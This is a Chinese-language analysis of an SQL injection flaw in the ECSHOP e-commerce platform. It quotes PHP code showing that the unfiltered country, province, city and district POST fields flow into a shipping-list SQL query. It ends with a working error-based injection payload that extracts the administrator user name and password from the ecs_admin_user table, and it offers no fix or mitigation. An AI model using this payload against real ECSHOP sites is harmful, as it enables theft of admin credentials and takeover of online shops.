关于ECSHOP新的注入漏洞的分析

function available_shipping_list



($region_id_list)

{

    $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .

                's.shipping_desc, s.insure, 



s.support_cod, a.configure ' .

            'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .

                $GLOBALS['ecs']->table



('shipping_area') . ' AS a, ' .

                $GLOBALS['ecs']->table('area_region') . ' AS r ' .

            'WHERE r.region_id ' . 



db_create_in($region_id_list) .   //这里$region_id_list没有过滤的，直接带入

            ' AND r.shipping_area_id = a.shipping_area_id AND 



a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';



    return $GLOBALS['db']->getAll($sql);

}

 /*

         * 保存收货人信息

         */

        $consignee = array(

            'address_id'    => empty



($_POST['address_id']) ? 0  : intval($_POST['address_id']),

            'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST



['consignee']),

            'country'       => empty($_POST['country'])    ? '' : $_POST['country'],      //这里country,province,city都是直接没有任何过滤的

            'province'      => empty($_POST['province'])   ? '' : $_POST['province'],

            'city'          => empty($_POST



['city'])       ? '' : $_POST['city'],

            'district'      => empty($_POST['district'])   ? '' : $_POST['district'],

            'email'  



       => empty($_POST['email'])      ? '' : $_POST['email'],

            'address'       => empty($_POST['address'])    ? '' : $_POST



['address'],

            'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),

            'tel'         



  => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),

            'mobile'        => empty($_POST['mobile'])     ? '' : 



make_semiangle(trim($_POST['mobile'])),

            'sign_building' => empty($_POST['sign_building']) ? '' : $_POST['sign_building'],

            



'best_time'     => empty($_POST['best_time'])  ? '' : $_POST['best_time'],

        );

/* 取得配送列表 */

    $region            



= array($consignee['country'], $consignee['province'], $consignee['city'], $consignee['district']);

//这里直接调用$consignee['country'], $consignee['province'], $consignee['city'], $consignee['district'] 进入函数available_shipping_list说明呢，这个注入可以改变'country','province','city','district'的任意值都可以成功的。

    $shipping_list     = available_shipping_list($region);

3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #